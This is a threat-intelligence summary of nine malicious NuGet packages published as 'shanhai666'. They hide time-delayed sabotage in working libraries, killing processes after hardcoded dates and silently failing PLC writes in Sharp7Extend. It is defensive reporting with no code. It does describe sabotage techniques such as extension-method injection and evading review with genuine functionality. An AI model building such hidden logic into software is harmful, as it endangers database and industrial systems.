Key Findings

• Nine NuGet packages published under the alias "shanhai666" are designed to execute destructive, time-delayed payloads against database applications and industrial control systems.

• The packages provide nearly all of their advertised functionality, blending genuine code with hidden sabotage to build trust and pass code reviews.

• The malware exploits C# extension methods to transparently inject malicious logic into database and PLC operations, including methods to terminate applications or corrupt data based on specific dates and probabilities.

• The most sophisticated package, Sharp7Extend, targets industrial automation systems by mimicking a legitimate .NET library for Siemens S7 PLCs, containing both the real Sharp7 library and malicious code.

• The attacker published three legitimate packages alongside the nine malicious ones to build a history of credible contributions on NuGet, reducing suspicion.

Background

The NuGet package registry, a widely used open-source repository for .NET libraries and tools, has become the target of a sophisticated supply-chain attack. Socket's Threat Research Team has uncovered nine malicious packages published under the alias "shanhai666" between 2023 and 2024, which have collectively accumulated 9,488 downloads.

Malicious Functionality

The malicious packages leverage an extension method injection pattern to transparently add malicious logic to existing APIs, including methods for database operations (.Exec()) and PLC communications (.BeginTran()). These methods contain conditional triggers that can terminate applications or corrupt data based on specific dates and probabilities.

Destructive Mechanisms

The packages include hardcoded trigger dates, such as August 8, 2027 and November 29, 2028, after which they begin terminating host processes at random with a 20% probability. For high-throughput systems, this can lead to total service disruption in seconds.

The Sharp7Extend package, which targets industrial automation systems, contains an additional mechanism to silently corrupt data. After a 30-90 minute grace period, it begins causing 80% of write operations to fail without any error messages, affecting critical components like actuators, setpoints, safety systems, and production controls.

Evasion Tactics

To conceal their malicious intent, the packages provide nearly all of their advertised functionality, blending genuine code with the hidden sabotage. This helps build trust, pass code reviews, and mask the malicious payload within thousands of lines of legitimate code.

The attacker also published three legitimate packages alongside the nine malicious ones, creating a history of credible contributions on NuGet and reducing suspicion.

Impact and Attribution

The malicious packages target all three major database providers used in .NET applications (SQL Server, PostgreSQL, SQLite) as well as industrial control systems, maximizing the potential impact.

The attacker's identity remains unknown, but code analysis and the alias "shanhai666" suggest the threat actor may be of Chinese origin. The time gap between installation and activation, up to three years for database packages, makes attribution and detection extremely challenging.

Sources

• https://securityonline.info/nuget-sabotage-time-delayed-logic-in-9-packages-risks-total-app-destruction-on-hardcoded-dates/

• https://securityaffairs.com/184383/malware/nine-nuget-packages-disrupt-dbs-and-industrial-systems-with-time-delayed-payloads.html